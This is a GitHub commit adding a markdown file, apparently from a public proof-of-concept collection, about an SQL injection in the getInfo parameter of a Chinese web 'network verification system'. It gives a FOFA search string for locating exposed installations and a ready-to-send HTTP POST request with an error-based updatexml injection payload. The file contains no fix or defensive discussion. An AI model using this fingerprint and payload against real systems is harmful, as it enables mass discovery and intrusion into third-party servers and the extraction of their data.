Create 网络验证系统getInfo参数存在SQL注入漏洞.md

This commit is contained in:
wy876 2024-03-27 10:19:42 +08:00 committed by GitHub
parent 7bb911b7e9
commit d771816d12
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,21 @@
## 网络验证系统getInfo参数存在SQL注入漏洞
## fofa
```
body="zhuya/js/base.js"
```
## poc
```
POST /index.php/api/Software/getInfo HTTP/1.1
Host:
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
data=123456&id=1 and updatexml(1,concat(0x7e,md5(123),0x7e),1)
```
![image](https://github.com/wy876/POC/assets/139549762/c0c54626-76ac-440a-97be-760bb17c61cb)